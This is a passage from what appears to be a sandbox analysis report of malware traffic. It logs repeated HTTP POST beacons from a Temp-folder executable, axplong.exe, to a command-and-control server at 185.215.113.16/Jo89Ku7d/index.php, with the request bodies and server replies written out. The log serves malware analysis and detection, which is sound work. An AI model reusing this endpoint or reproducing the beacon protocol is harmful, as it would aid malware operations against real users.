                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:21.316771984 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.553663185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:21.440730095 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:22.227663994 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:22.228288889 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:22.486747026 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.553664185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:22.609695911 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:23.420958996 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:23.421750069 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:23.961251974 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 13:44:23.962969065 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.553665185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:24.085014105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:24.838655949 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:24.839737892 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:25.088057995 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.553666185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:25.202759981 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:25.963359118 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:25.963992119 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:26.213289976 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.553667185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:26.327104092 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:27.104212999 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:27.104967117 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:27.351181030 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.553668185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:27.467679024 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:28.213622093 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:28.214281082 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:28.828835964 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 13:44:28.831890106 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.553669185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:28.938251972 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:29.698223114 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:29.720066071 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:29.970496893 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.553670185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:30.092801094 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:30.841072083 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:30.841828108 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:31.097278118 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.553671185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:31.217688084 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:31.972146034 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:31.972816944 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:32.220459938 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.553672185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:32.373944998 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:33.154531002 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:33.155664921 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:33.448235035 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.553673185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:33.562948942 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:34.337992907 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:34.338814020 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:34.728729963 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 13:44:35.075078964 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


